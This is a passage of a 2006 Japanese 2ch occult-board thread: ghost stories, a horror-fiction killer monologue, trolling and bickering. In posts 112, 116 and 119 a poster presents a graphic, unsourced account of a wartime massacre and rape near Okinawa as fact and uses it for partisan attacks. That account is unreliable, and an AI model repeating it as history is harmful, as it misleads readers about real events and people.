と同時に今日、広告がでていることの不気味さに鳥肌がたちました。
あまり怖くないですね。すみませんでした。

61 :本当にあった怖い名無し:2006/10/06(金) 13:01:05 ID:o988stn+0
>>60
それは怖いですね
自分も似た経験があるので良くわかります。

62 :本当にあった怖い名無し:2006/10/06(金) 13:04:20 ID:4+DfBoKk0
>>60
TVで放送してる事が何故詳しく言えないのかがオカルトって事ですか

63 :本当にあった怖い名無し:2006/10/06(金) 13:07:13 ID:o988stn+0
>>62
不正行為があったのに今日広告が出てることがレトルトってことじゃないですか?

64 :本当にあった怖い名無し:2006/10/06(金) 13:30:11 ID:v0PL9B5rO
三年くらい前の話。

学生だった時分だ。
親が居なくて静かで寂しいので友達二人を呼んで、泊まらせる事にした日。
未成年のくせに老けた顔利用して酒を買い、二階の自分の部屋に行こうとしたわけだ。
階段は結構急だから、友達を先に行かせて私が最後になるようにした。

真ん中くらいでかな?
背中を
「どん!」
と強く押された。
誰もいるはずない、書いた通りこの日親はいない。兄弟は嬉しげに夜遊びに行ってる。
……なら、今の手は、誰?
そこまで考えた時、マジで顔青くなった。
何してんだ、とか言ってる友達を部屋に押し込んで、小さい紙皿に塩盛って四隅に置いた。
なんで塩があるのか。兄ちゃんがなぜか私の部屋でよくトマトに塩かけて食うから袋ごとある。
この時ばかりは兄に感謝した。携帯で奴らの帰る時間を聞いてそれまではテレビ見て過ごした。

帰って来た兄が部屋のドア開けて一言。

「お前の部屋の前、ケチャップみたいなのまけてるんだけど」
えぇ……とろりとした、垢黒い、アレがありました。
ちなみに盛り塩は翌朝ゲルになってました。ので庭に捨てた。

65 :本当にあった怖い名無し:2006/10/06(金) 13:34:14 ID:8jBDg5EfO
>>63
よくレトルト話ってわかりましたね。

66 :本当にあった怖い名無し:2006/10/06(金) 13:46:34 ID:o988stn+0
>>65
ええ。詳しくはいえませんが私も似たような経験があったので。
詳しくはいえないのでこれ以上詮索しないでください。

67 :本当にあった怖い名無し:2006/10/06(金) 14:05:26 ID:N20LkovHO
>>66
とりあえずあなたは砲丸スレに行けばヒーローになれますよ

68 :本当にあった怖い名無し:2006/10/06(金) 14:13:18 ID:8jBDg5EfO
バナナマン日村

69 :本当にあった怖い名無し:2006/10/06(金) 14:19:23 ID:o988stn+0
>>68
このスレとどういう関係があるのでしょうか?
kwsk!

70 :本当にあった怖い名無し:2006/10/06(金) 14:22:59 ID:o988stn+0
>>68
このスレとどういう関係があるのでしょうか?
kwsk!


71 :本当にあった怖い名無し:2006/10/06(金) 14:24:48 ID:8jBDg5EfO
>>67
KWSK

72 :本当にあった怖い名無し:2006/10/06(金) 14:26:11 ID:8jBDg5EfO
>>69
天丼か!

73 :本当にあった怖い名無し:2006/10/06(金) 14:26:14 ID:o988stn+0
>>67
行ってみたが単位が無いからダメなんじゃないのか?

74 :本当にあった怖い名無し:2006/10/06(金) 14:26:48 ID:o988stn+0
>>68
このスレとどういう関係があるのでしょうか?
kwsk!

75 :本当にあった怖い名無し:2006/10/06(金) 14:29:43 ID:o988stn+0
なんかブラウザの調子がおかしい
書き込むボタンを押すたびに書き込まれてしまう(´・ω・`)

76 :本当にあった怖い名無し:2006/10/06(金) 14:40:20 ID:8jBDg5EfO
>>75
嘘はっぴゃくちゃんめ〜

77 :本当にあった怖い名無し:2006/10/06(金) 14:46:10 ID:o988stn+0
>>76
ほんとですよ(´・ω・`)
ボタンを押すたびごとに書き込まれちゃうんですよ(´・ω・`)

78 :本当にあった怖い名無し:2006/10/06(金) 14:47:35 ID:8jBDg5EfO
>>75
ん?あたりまえじゃね?

79 :本当にあった怖い名無し:2006/10/06(金) 14:51:36 ID:8jBDg5EfO
>>77
ん?あたりまえじゃね?

80 :本当にあった怖い名無し:2006/10/06(金) 14:52:46 ID:Ipn2XWlzO
またお前か

81 :本当にあった怖い名無し:2006/10/06(金) 14:52:49 ID:o988stn+0
>>79
ちょwww同じ現象wwwwww
これぞレトルト(`・ω・´)

82 :本当にあった怖い名無し:2006/10/06(金) 14:55:35 ID:o988stn+0
>>79
あ、アイカゴか?

83 :本当にあった怖い名無し:2006/10/06(金) 15:06:35 ID:8jBDg5EfO
最近このスレ来たんだけどアイカゴって何なの?
荒らし?

84 :本当にあった怖い名無し:2006/10/06(金) 15:13:31 ID:o988stn+0
>>83
自分の書込み履歴見てこい
http://hobby7.2ch.net/test/read.cgi/occult/1159108400/

85 :本当にあった怖い名無し:2006/10/06(金) 15:16:43 ID:8jBDg5EfO
>>84
見れねぇじゃねぇかよ、低能が!!

86 :本当にあった怖い名無し:2006/10/06(金) 15:17:34 ID:o988stn+0
>>85
じゃかわしぃわぃ!

87 :本当にあった怖い名無し:2006/10/06(金) 15:19:24 ID:8jBDg5EfO
>>86
激しねや!!

88 :本当にあった怖い名無し:2006/10/06(金) 15:19:49 ID:4+DfBoKk0
つまらん書き込みしてる俺が言うのもなんだが
ここはおまいら2人の雑談スレじゃないぞ・・・

89 :本当にあった怖い名無し:2006/10/06(金) 15:22:50 ID:o988stn+0
すみませんでした

90 :本当にあった怖い名無し:2006/10/06(金) 15:23:08 ID:ssIbB5150
1人だけどな、

91 :本当にあった怖い名無し:2006/10/06(金) 15:28:15 ID:8jBDg5EfO
>>89
一緒にロムるに(-.|

92 :本当にあった怖い名無し:2006/10/06(金) 15:38:06 ID:o988stn+0
|.-) ・・・

93 :チョコレート:2006/10/06(金) 16:19:06 ID:8jBDg5EfO
2月14日
今日も僕はいつものように同じ机でワークタイム
ただいつもと違うことがひとつだけ
生まれてこの方バレンタインチョコなどもらったことがない僕がチョコをもらったのだ
うれしかった
僕にチョコレートをくれた君は社内でも軍を抜くほどとても綺麗なかただ
来年もくれるかな?
僕は別に甘いものが好きなわけでもなかった
何故チョコをくれたのかな
僕に恋愛感情をいだいてくれているのだろうか?不思議だ…僕のどこにひかれたのだろう
僕は君のことは好きではない
タイプではないのだ…
でも、そこまでいうなら…

いうなら…

憑きあってあげてもいいんだけどね…

94 :怖い話 (チョコレート外伝):2006/10/06(金) 16:39:48 ID:8jBDg5EfO
これは私が21のころの話である。
私は21で車の免許を取得した。取り立てで嬉しかった私は、母の車でドライブに出かけた。
ドライブに出かけて1時間くらいたっただろうか。空も赤く染まり綺麗な夕焼けになってきた。
自分で運転しながら見る夕日か…なんて思っていたら、少し眠くなってきてしまった。私はパチンコ屋の駐車場で少し仮眠をとることにしました。
起きると外は真っ暗、時計をみると3時間も眠っていたのだ。
「帰らないと…」
その時!!パトカーが私の乗っている車のほうに近づいてきたのである。
「なんだなんだ?」
と思っていたら、止まらず突っ込んできたのだ。
ガッシャーーン!!
「!!な、…が??」私が死ぬ前の記憶はここまでしかない。


95 :本当にあった怖い名無し:2006/10/06(金) 16:56:57 ID:Ekvtw5jH0
この荒らしはつまんねぇ創作が好きなのか。
っていうか、ここを荒らす奴って創作好きが多いよな。
やはりあれか?
自作の話を酷評されて叩かれて、怨霊化した奴なのか?

96 :本当にあった怖い名無し:2006/10/06(金) 17:14:20 ID:8jBDg5EfO
>>95
私は生きてますよ

97 :本当にあった怖い名無し:2006/10/06(金) 17:25:15 ID:8jBDg5EfO
まかしまみきてますよ

98 :引越し・・・:2006/10/06(金) 17:25:42 ID:8rfVWv3j0
一人暮らししようと必死でバイトしてお金が貯まったから部屋を借りようと
近くの不動産屋で行った。小汚い不動産屋だ。大丈夫か?と思ったが
見るだけなら問題ないだろうと行ってみることにした。

壁には古びたチラシがいっぱい貼ってあった。
何かいい物件がないと見ていたら。ひとつの物件に目がいった。
それはありえない物件だった・・・。

築3分!駅徒歩15年!ありえない・・・

99 :本当にあった怖い名無し:2006/10/06(金) 17:25:51 ID:j+9byO720
削除依頼するの大変なんだから大人しくしてね♪

100 :本当にあった怖い名無し:2006/10/06(金) 17:26:03 ID:8jBDg5EfO
中島美嘉ですわよ

101 :本当にあった怖い名無し:2006/10/06(金) 17:26:47 ID:P3YWa9AIO
死ねばいいのに

102 :本当にあった怖い名無し:2006/10/06(金) 17:28:59 ID:o988stn+0
岩田さゆり!!

103 :本当にあった怖い名無し:2006/10/06(金) 17:32:16 ID:AZoT8j0yO
好きな子が俺の制服にゲロぶちまけた。

104 :本当にあった怖い名無し:2006/10/06(金) 17:35:18 ID:8jBDg5EfO
みんな荒らすなよ!!

105 :本当にあった怖い名無し:2006/10/06(金) 17:35:31 ID:AZoT8j0yO
コトリバコ

106 :本当にあった怖い名無し:2006/10/06(金) 17:39:59 ID:o988stn+0
>>105
リョウメンスクナ

107 :本当にあった怖い名無し:2006/10/06(金) 17:59:29 ID:8jBDg5EfO
ヘッドロココをかけて

オリラジ藤森Eビックリマンコ       レクター

デスマッチ3本勝負!!!!

108 :本当にあった怖い名無し:2006/10/06(金) 18:02:36 ID:o988stn+0
お前らほんとにやめれ
怒るよ

109 :本当にあった怖い名無し:2006/10/06(金) 18:16:43 ID:16ATI8vXO
師匠の続きが読みたいなぁ。

110 :本当にあった怖い名無し:2006/10/06(金) 18:16:53 ID:8jBDg5EfO
>>108
そもそもだな〜お前がだな〜原因をだな〜作りだな〜上げたんじゃまいか(ry

111 :本当にあった怖い名無し:2006/10/06(金) 18:17:47 ID:o988stn+0
>>110
どこよ?どこがよ?どれよ?

112 :本当にあった怖い名無し:2006/10/06(金) 18:25:35 ID:6PYMf4wI0
左翼は必ず「沖縄での日本軍の横暴」をあげつらう。
しかし左翼が絶対に伝えない事件がある。
それは「反戦主義者の脱走兵」達によって起こった沖縄の隣島虐殺事件である。
事件の全貌はこうだ。
沖縄での決戦前夜こっそりとボートで抜け出し隣の島に逃げ込んだ小隊があった。
彼らはまず島長の喜安氏と交渉し、この島の空家においてもらうことを約束した。
最初、彼らはおとなしかったが徐々に沖縄県民特有ののんびりした性格の島民につけこみ始めた。
まず食事を残り物からご馳走に変えさせ、布団、衣服を要求した。


113 :本当にあった怖い名無し:2006/10/06(金) 18:26:21 ID:o988stn+0
>>112
そうだね僕もおおむね同意

114 :本当にあった怖い名無し:2006/10/06(金) 18:31:25 ID:8jBDg5EfO
>>113
ほらまた!

115 :本当にあった怖い名無し:2006/10/06(金) 18:34:36 ID:klLRDCD50
友達が入院したんだが、病院にまつわる話でメチャメチャ怖い話ってないかい?
携帯で送るつもりだからあまり長くないのがあれば教えて欲しいんだが。

116 :112:2006/10/06(金) 18:39:23 ID:KgolnVbE0
かなり図々しい要求を島民が黙って飲み込んだ為、要求はエスカレートの一途を辿った。
その内、酒などの贅沢品や沖縄舞踊の踊り子の派遣を島民達に強要し、挙句に喜安氏に住居の明け渡しを迫ったのである。
当然、喜安氏は要求をはねのけた。激怒した脱走兵達はスパイ容疑を喜安氏にかけ、小隊全員で喜安氏に暴行を加えた後射殺した。
喜安氏の娘(16)の目前でである。父を目の前で殺され錯乱した喜安氏の娘を小隊は輪姦した。
その後脱走兵達は喜安氏の家から男手を追い払い、美女ばかりを集め毎晩楽しんだ。
沖縄で日本兵達が激戦を潜り抜けているすぐ真横の島で脱走兵達はこの世の極楽を楽しんだのである。
終戦後、彼らは島中から金品を没収し、のうのうと帰還した。
容姿が美しかった為に毎晩輪姦された喜安氏の娘は妊娠し、激怒した喜安氏の弟は脱走兵達に責任を持つ
ように詰め寄ったが逆に半殺しにされた。


117 :本当にあった怖い名無し:2006/10/06(金) 18:39:54 ID:Zy9FeKIKO
特定のIDだらけだな
コテ付けなければ判らないとでも思ってるのか?

118 :30 ◆RPG8JNHiII :2006/10/06(金) 18:44:51 ID:CIY8rswx0
なんだこれ
なんか荒れてるな

119 :116:2006/10/06(金) 18:45:35 ID:KgolnVbE0
正直、沖縄で「投降しようとした村人を日本兵が射殺」などより余程悪辣で許しがたい事件である。
しかし左翼マスコミはこの事件を一切報道しない。
なぜならこの事件の犯人達は「反戦主義者」の「脱走兵」であり、「左翼」であり自分たちの仲間である。
局を挙げて反日番組を造るTBSや、「有事には逃げなさい。敵前逃亡は恥ずべきことでない」などと主張する
筑紫 哲也がこの事件を黙殺するのは当然である。

120 :本当にあった怖い名無し:2006/10/06(金) 18:51:09 ID:KMZbJdLW0
俺の話がまとめに載らなかった(´・ω・`)ショボーン

121 :本当にあった怖い名無し:2006/10/06(金) 18:54:17 ID:8jBDg5EfO
>>117
コテってつおい?

122 :本当にあった怖い名無し:2006/10/06(金) 19:07:51 ID:pChH1K1E0
>>115
一応オカルト的な長い話なら知ってるんだが、それじゃダメそうなので
ちょと怖いがオカルトではない話。

点滴ってあるよね?
よく点滴中に空気が入ると血液中に空気が混じって死ぬとか(ジョジョの奇妙な冒険でやってたけど)
気泡くらいなら途中で対策がしてるので実は問題なかったりする。
それよりももっとシンプルで怖いことが点滴にはある。
それは逆流すること。例えば管のどっかが外れたりするとどうなるか?
こうすると血が今度は管からドンドン外に出ていくようになる。

これは実際に自分が入院してるときにあった事なんだけど、
一緒に駄弁っていた患者さんがたまたま管が外れてるのに気がつかなくてさ。
ふとシーツに目をやると血の海で真っ赤に染まってた。
で慌ててナースコールで看護婦さん呼んで直してもらった。
当の本人も逆流してることにさっぱり気付かず「これ寝てたりしてら楽に死ねるな」って冗談交じりに言ってた。

もし友人が点滴をしていたら、寝相には注意しておけ。と言っておくといいよ。
運が悪ければそのまま直行コースが待っているかもしれない。


123 :本当にあった怖い名無し:2006/10/06(金) 19:16:39 ID:TzkWtbq7O
10年くらい前にバザーで大きめの鏡を買った。
婆ちゃんがどうしても「買ってあげる」って言うので…
右下に子犬の絵が付いてるんですが、正直可愛い鏡ではありません。
家に帰って気が付いたのですが、裏に小学生が書いたような名前が
ありました。それは友人の名前でした。仮名で「アキ」とします。
私は高校生なのですが、アキもずっと同じ進路で同じ高校です。
アキに鏡の事を聞くと、中学の頃には家になかったそうです。
なぜか突然なくなったそうです。

124 :本当にあった怖い名無し:2006/10/06(金) 19:24:56 ID:TzkWtbq7O
友人の鏡だったこともあり、自分の部屋に置くことにしました。
私は深夜にラジオをつけたままじゃないと眠れないんですが、
時々三時を過ぎても眠れない時があります。
何となく鏡のほうを見たとき、鏡に何かが写っているのがわかりました。
ポスターがうつってるなって感じで何気にずっと見つめてると
それは正座した知らないお婆さんでした。
ビル掃除をするような作業服を着ています。

125 :本当にあった怖い名無し:2006/10/06(金) 19:30:51 ID:TzkWtbq7O
気持ちが悪いことに、部屋の電気は消してるのに鏡の中がハッキリ見えます。
暗闇でテレビを観ている感じです。
二秒位しか見てないのですが、いまだに脳裏に焼き付いてます。
薄緑の作業服を着たお婆さんが正座して、赤ちゃんを抱いてます。
抱くというより、両脇を持ってこっちに赤ちゃんを見せつける感じです。

126 :本当にあった怖い名無し:2006/10/06(金) 19:35:35 ID:JI1TmqJI0
>>95
ヤレヤレ

127 :本当にあった怖い名無し:2006/10/06(金) 19:38:22 ID:+8gJA2il0
荒らしが去るまでまつか?

128 :本当にあった怖い名無し:2006/10/06(金) 19:38:52 ID:TzkWtbq7O
翌朝すぐに鏡を倉庫にしまいました。
夜のことは誰にも言いませんでした。
一年後修学旅行でアキと一緒の班になりました。
夜に鏡の事を話しました。まず遠まわしにお婆さんの事から…
お婆さんは一年前に亡くなったそうですが、マンションの管理人だったそうです。
私は鏡の人はアキのお婆さんと確信しました。そしてあの夜の事を詳しく話しました。

129 :本当にあった怖い名無し:2006/10/06(金) 19:40:57 ID:TzkWtbq7O
私タイミングが悪かったかな…

130 :本当にあった怖い名無し:2006/10/06(金) 19:43:35 ID:klLRDCD50
>>122
逆流することなんかあんの!?
ちょっと俺がビビってしまって趣旨とは変わっちゃったけど早速送ってみる。
dクス

131 :本当にあった怖い名無し:2006/10/06(金) 19:46:19 ID:+8gJA2il0
>>129
大丈夫ですよ。続けてください。

132 :本当にあった怖い名無し:2006/10/06(金) 19:49:34 ID:8jBDg5EfO
>>127
だな…

133 :本当にあった怖い名無し:2006/10/06(金) 19:50:12 ID:ItVZA6s+O
>>130
逆流するよ。122ほど酷くはなったことないけど

134 :本当にあった怖い名無し:2006/10/06(金) 19:53:30 ID:Q5TNjG07O
ちっ、エロイ奴らめ。
集合(´∀` )/

135 :本当にあった怖い名無し:2006/10/06(金) 19:57:48 ID:TzkWtbq7O
>>131ありがとう

結局アキは赤ちゃんを抱いてる意味がわからないと言ってました。
旅行から帰って数日後、アキが深夜に電話をしてきました。
お母さんに何気に鏡の事を話したそうです。
お母さんはその話を聞いて号泣して詳細を教えてくれたそうです。

アキが中学生の頃、お母さんは妊娠したそうです。アキも今知ったとか…
妊娠が分かった日、アキの祖母(鏡のひと)、父、母の三人で
朝まで話し合ったこと、
父はとにかく「おろせ」の一点張りだったこと、
祖母は部屋の隅で鏡の前でずっと泣いていたこと…
くわしく教えてくれました。

136 :ヒマ ◆l/ZNLImp/Q :2006/10/06(金) 19:59:21 ID:BVStsyX+O
何か書こうか

137 :本当にあった怖い名無し:2006/10/06(金) 20:00:46 ID:ULvHww6v0
>>130
あんまりないし、あってもそんな酷くなることはない。
けど途中で管が外れた場合だと、献血と同じ要領で血がガンガン流れてく。

138 :本当にあった怖い名無し:2006/10/06(金) 20:01:45 ID:NSx6Kk3cO
>>135
こわせつないね

139 :本当にあった怖い名無し:2006/10/06(金) 20:02:12 ID:8jBDg5EfO
荒らしはまじやめろって…いっても分かんないか…

140 :本当にあった怖い名無し:2006/10/06(金) 20:02:36 ID:TzkWtbq7O
アキは三人姉妹で、お婆ちゃんは「男の子だったらいいね」と
前向きだったそうで…


すみません、続きはあとで書きます。家のパソコンが空きました。

141 :???:2006/10/06(金) 20:03:35 ID:pzBe1Q8GO
>>136
>>135さんが終わったら、頼むわ

142 :ヒマ ◆l/ZNLImp/Q :2006/10/06(金) 20:12:08 ID:BVStsyX+O
真夜中、突然目が覚めた。
また寝ようか思ったけど煙草が吸いたかったから一服した。

煙を外に出したかったから窓を開けた。

窓の外に人がいた。

目があった。

小さなおかっぱ頭の女の子だった。

こっちを見て笑っていた。

何でこんな夜中に?


突然女の子がこう言った


『お前明日首飛ぶぞ』

?気付けば朝だった。


すぐに首を触った


何の異常もなかった。

ホットして起きたら昨日の女の子が部屋に入ってきた
笑いながらこう言った『嘘に決まってるでしょ!』
お前誰やねん

143 :本当にあった怖い名無し:2006/10/06(金) 20:19:57 ID:ULvHww6v0
なんか朝から晩まで携帯のPCの二つ使って延々と荒らしてるニートが住み着いてるな(;´Д`)

まぁそんな可哀想な人一名に負けずに頑張って。 >>135

144 :本当にあった怖い名無し:2006/10/06(金) 20:25:01 ID:TzkWtbq7O
パソコンまだ使えませんでした。


アキのお母さんは鏡にうつる祖母の泣き顔が忘れられず、
鏡を手放したそうです。
鏡はまだ持ってます。アキがどうしても持ってて欲しいと言うので…
きれいごとのようになりますが、いつかアキが子供を産んだときに
その子を鏡にうつしてお婆ちゃんを喜ばすって言ってます。

145 :本当にあった怖い名無し:2006/10/06(金) 20:27:26 ID:8jBDg5EfO
>>143
携帯のパソコンの?

146 :本当にあった怖い名無し:2006/10/06(金) 20:27:40 ID:K7KNDFmi0
乙。切ない話だね。


147 :本当にあった怖い名無し:2006/10/06(金) 20:52:33 ID:C5iSSpYs0
>>98
わははっ
激笑物件

独り立ちがんばれ!
ほんのり怖いのにあたったらカキコしてね。


148 :本当にあった怖い名無し:2006/10/06(金) 20:56:14 ID:NSx6Kk3cO
オツ。良い話だよ

149 :本当にあった怖い名無し:2006/10/06(金) 20:59:26 ID:8jBDg5EfO
なんか涼しい日に聞く怖い話も乙ですな〜
   ↑

150 :1/2 タワー:2006/10/06(金) 21:07:58 ID:utvY2LIv0
 暫く歩いていると、目の前に明かりが開けた。
 このタワーの中には私しかいないのだろうか。
 この膨大なまでに広がったタワーの世界をただ彷徨い続けている。
 無機質な冷たい鉄の壁が、私をタワーからは出してくれない。
 どんなに壊そうとしても、鈍い音がただ虚しく辺りに響くだけ。
 私は、このタワーの階段を上がり、上部へ向かっているらしい。
 いや、正確にはこのタワーから脱出しようとしているのか。
 そもそも、何で私はこの中にいるのか。記憶がない。
 そして、今、下った方が出口に近いのか、それとも、上がったほうが出口に近づくのか
 それすらもわからない。
 私の精神が崩壊していくのが早いか、出口を見つけるのが早いのか、
 私はただ出口を求めて歩いていた。



151 :2/2 タワー:2006/10/06(金) 21:09:06 ID:utvY2LIv0
「誰か、いませんか?」私の声が寂しく響く。
「ダレカ、イルノカァ?」前方から男の声が聞こえてきた。
「何処ですか? 何処に居るのですか?」
「ドコニイル? ドコニイルンダァ?」男の声が返ってきた。
 私は声のする方へ足を速めた。
 私は安堵した。私以外にもこのタワーの中に人がいる。
「す、すいませーん。聞こえますか!」私の声に男の声が続く。
「ス、スイマセェン。キコエルノカ!」
 先ほどから違和感を感じる……。深く考えてはいけない。
「私は、ここにいます!」
「オレハ、ココニイルヨ!」
 駄目。声のするほうへ向かっては駄目。私は踵を返し、元来た道へ引き返した。
 カッカッカッカッ……。私の足音が響きわたる。
 カッカッカッカッ……。私の足音だけではない。私の後ろからも音がする。
「いやー! 来ないで、来ないで!」
「イヤ〜! コナイデェ、コナイデェ!」
 息が切れ、私の脚が止まった。同時に、足音も止んだ。
 ゼェゼェ……。ゼェゼェ……。
 二人の呼吸しか聞こえない。
「もう駄目……」
「アァ、ダメヨォ」男が愉しそうな笑みを浮かべた――

 ――白い壁に囲まれ、優しい日が射す部屋。まるで僕は、ベッドの上の白雪姫が眠りから覚めるのを待っているようだ。
 僕は自分を呪った。僕のせいだ。彼女が寝たきりになってしまったのも全て。
 僕と彼女を乗せた車は、カーブを曲がりきれずに崖から落ちた。
 何故、僕だけ……。彼女には何も罪はないはずだ! 神様。何故僕だけを取り残すのですか……。
 僕の気持ちが伝わったのか、彼女がゆっくりと眼を開けた。あぁ、神様……。

「ヤットデラレタヨォ」

 僕の知っている彼女は、もう居ない。


152 :本当にあった怖い名無し:2006/10/06(金) 21:25:31 ID:PnMrewP+O
>>150151こーゆー話苦手だわ

153 :本当にあった怖い名無し:2006/10/06(金) 21:28:24 ID:S8lz0Vq10
>>152
2chのスレは1000までが限界なのです

こないだVIPで1001までいった奇跡があったけどw

154 :本当にあった怖い名無し:2006/10/06(金) 21:31:21 ID:vF5XFzQGO
2年程前の話ですが、つい最近完結(?)した話があるので書いていこうと思います。
長くなりそうで申し訳ないのですが、霊感0の自分が唯一味わった霊体験です。

広島県F市某町、地元の人間なら誰もが知る有名なスポットがある。「お札の家」と呼ばれたその場所には、名前通り無数のお札が貼られた家がある。
他の噂ばかりのスポットとは違い、ソコを訪れた大学の友人はほぼ全員が不思議な体験をしたという。
普段霊感のない人にも見えるらしい。

友人の話
「家の周りだけ不自然に濃い霧が覆っとったんよ、んで冗談半分で霧に塩投げたらいきなりブワッと霧が裂けたんじゃーw流石にヤバ過ぎる思って逃げたったw」
どうやら異様な数の霊が集まってくる場所で、見える人によればお札に阻まれ家に入れない霊がウヨウヨいる、とのコト。
上の友人のコメントは印象強くて今でも忘れられないが
「霊感が無くても見えた」霊感の無い自分にとってはいつか行きたい魅力的なスポットだった。


155 :本当にあった怖い名無し:2006/10/06(金) 22:01:11 ID:vF5XFzQGO
>>154続き

ふとした日、ファミレスでの食事中にお札の家の話を切り出した。
居合わせた仲の良い先輩とその彼女、友人S、はヤケにノリ気「今すぐ行こう」となった。元々地元の先輩と彼女は高校時代に行ったことがあるらしかったが、恐くて車を降りれなかったらしい。他県からきていたSは特にノリ気だった。
話を出した後で少し恐くなり後悔したが、遅かった。

自分「いや、ホンマにヤバいらしいで?ソコ行って一週間寝込んだヤツとか、帰り事故ったヤツとか普通におるらしいで?」
S「今さら何ビッっとんw俺霊感あるし、子供の頃から普通に霊とか見ようたし、その気になりゃ霊にもキャン言わしちゃるけぇねw」

自分は内心コイツ馬鹿だなー、と思っていたが
本当に危ない霊がいたらすぐに教える、お前を先に逃がす。
と言われ普段から怖いもの知らずで気が強いSが同伴するということもあり、お札の家に行くコトを承諾してしまった。

時間は大体23時を回ったくらい。心霊スポットに来るには早い時間だったが、お札の家に続く林道は重々しく、暗いってだけで雰囲気があった。

156 :本当にあった怖い名無し:2006/10/06(金) 22:27:34 ID:vF5XFzQGO
>>155続き

車から降り「うっわ、やっぱヤメといた方がエエんと違うーっ!?w」等とハシャイでいたが、先輩カップルが車から降りて来ない。
自分「どぉしたんすかー?w」
先輩「R(彼女)が気分悪いから無理やって、俺も残るわ」
S「えぇー!せっかく来たんすから見るだけ見に行きましょうよー!」
先輩「いやいやホンマにえぇわ、お前ら二人で行ってき」
S「何ビッてんすかw霊なら俺に任しといてくださいよー!」
先輩「うるしゃーわお前!!Rが気分悪い言うとろうが!!調子に乗んな!!」

半分喧嘩になりかけたので慌てて止めに入り、渋々二人きりで行くことになった。
S「あーもー何なん!?絶対あの二人車の中でエロいコトする気やで」
自分「こんな所てそれはないじゃろ…てかお前先輩に態度デカ過ぎ」
S「戻ったら思いっきり窓ガラス叩いて脅かしちゃろうでw」
自分「…」

呆れて言葉も無かったが、急に視界に飛込んできたバリケードに驚き、立ち止まってしまった。

S「…こっからが本番っちゅうコトかw」

ここから先○○市保有地区により立入り禁止。

有刺鉄線まで使われた厳重なバリケードだった。乗り越えることができなかったので、一度林に逸れて、の有刺鉄線が途切れた所で乗り越え、また道に戻り先に進んでいった。

157 :本当にあった怖い名無し:2006/10/06(金) 22:42:02 ID:cOueyJxx0
.

158 :もこ:2006/10/06(金) 22:44:01 ID:g0EKjdQy0

もこですぅ

こんばんわぁ

159 :本当にあった怖い名無し:2006/10/06(金) 22:48:57 ID:PUgfDBkYO
方言表記がウザい

160 :本当にあった怖い名無し:2006/10/06(金) 22:49:35 ID:vF5XFzQGO
>>156続き

今考えるとあのバリケードを越えた瞬間、急に寒くなった気もするし、そんなコトは無かった様な気もする。
とにかく空気が変わった、ってコトは自分にもわかった。
緊張してしまい、無言で歩く自分。裏腹にSはやたらキョロキョロし
「あっソコにおるなー。おぉ!アッチにもおるで〜。」相変わらずのハシャギ様だった。

所でお札の家にはダミーがある、というコトを前々から聞いていた。

学校の友人「あんなー、林道を進むとまず一件の白い家にぶつかるんじゃ。でもその家は放置されたホンマに普通の民家じゃけ、
その家の横に登坂になった獣道があるけぇソコを登らんとお札の家には辿り着けんよ?タマにその普通の民家をお札の家と勘違いしてそのまま帰ってくるヤツとかおるけぇのーw」

そしてそのダミーの家は本当にあった。Sにダミーの家の話はしてあったので、二人とも落ち着いて家の横の獣道を目指した。

そこでSが
「ちょぉ待って、煙草に火ィ着けるけぇ」と立ち止まった。
なかなか火が着かない。
ボーッと白い家を眺めていた自分は
「ココも中々雰囲気あるなぁ」と白い家に近づいた。



161 :クリリン:2006/10/06(金) 22:54:29 ID:8jBDg5EfO
悟空ーーーーっっ↑↑

162 :本当にあった怖い名無し:2006/10/06(金) 23:09:32 ID:mq9Fd6Jq0
つづきまだー?

163 :本当にあった怖い名無し:2006/10/06(金) 23:11:13 ID:hm5Ix3on0
できれば書き溜めて、一気に張り付けてほしい・・・。

164 :本当にあった怖い名無し:2006/10/06(金) 23:13:07 ID:vF5XFzQGO
>>160続き

なぜかその普通の民家も周りをチェーンで仕切られていた。
特に何も感じずチェーンをくぐろうとすると

「Mっ!!(自分の名前)」

Sに呼び止められた。
驚いて振り向くとSが煙草をくわえたまま目を見開いてコッチを見ている。
何事かワケが分からず動けないでいた自分だが、Sの視線が自分では無く、自分の背後に向けられいる、と気づいた時全身に鳥肌が立った。
背筋が凍るように冷たくなったのは生まれて初めてのコトだった。

すぐにSに向かって走り出したいがどうにも足が動かない。完全にパニックになっていた。
それを察してかは知らないが、突然Sが

「うぉぉぉぉぉぉぉぉぉっっ!!」

と馬鹿デカい雄叫びを上げ、もと来た道へ走りだした。その大声に助けられ、自分も我に帰って全力で駆け出した。林道がやけに長く感じ、絶望的な恐怖感があったが
「後ろを振り返ってはいけない、ってまさに今のこういう状況のコトを言うのだろうな」という考えが頭をよぎったのを覚えている。

ようやく林道を抜け一般道に飛び出し、凄い勢いで車に乗り込んだ。

165 :本当にあった怖い名無し:2006/10/06(金) 23:17:38 ID:tyi1Mh5H0
これは書きながらの投稿だな。

166 :本当にあった怖い名無し:2006/10/06(金) 23:18:47 ID:vF5XFzQGO
>>163

あ、そうします!続きが長くなりそうなので。


>>159

…キャン言わすぞお前

まぁ確かに読みにくそうなんで改めます。



167 :本当にあった怖い名無し:2006/10/06(金) 23:20:32 ID:yITLmUufO
SMだったのか……!

168 :本当にあった怖い名無し:2006/10/06(金) 23:21:47 ID:utvY2LIv0
 錆びた鉄のような、いや、もっと生々しく、鼻の奥から伝わり、或いは眼球の神経を通して、快楽が五臓六腑に染み渡る。
 そんな血の匂いと死顔がたまらなく好き。
 血の匂いは、脂の乗った若い女が好ましい。以前は、犬の血が大好きだった。
 香水の匂いとそれが交じり合い、なんとも云えぬ芳香を醸し出す。
 死顔は、まだ世界を知らない無邪気な子供が好ましい。
 ニキビがまだない綺麗な顔が、初めて死の存在を隣に感じる。その時、刻まれる儚い夢から覚めてしまった様な顔。
 氷細工のように脆いその刹那を、永久に封じ込める。
 これがボクの生き甲斐だ。ボクは瞬間を感じ、それを作り出すアーティストだ。
               


169 :本当にあった怖い名無し:2006/10/06(金) 23:22:54 ID:yITLmUufO
>>153

170 :本当にあった怖い名無し:2006/10/06(金) 23:23:17 ID:utvY2LIv0
 ――僕が神様と初めて出会ったのは、三年前のことだった。
 この辺りでは有名な心霊スポットに、友達と僕四人で遊びに行ったときだ。
 廃墟になった病院……。そこにはとある噂が広がっていた。
 ある日、病院の患者達が、何者かによって無残にも切り刻まれるという事件があった。
 その鋭い傷口から、凶器はメスだということがわかり、犯人はこの病院関係者ではないかと言われ始めた。
 案の定、犯人発覚にはそれ程時間はかからなかったらしい。
 犯人はこの病院で働くナース。夜中巡回をしていた他のナースが、現場を目撃し、応援を呼び
 皆が集まった頃にはもう遅かった。彼女は自らの首を切りつけ、そこには血の海が広がっていた。
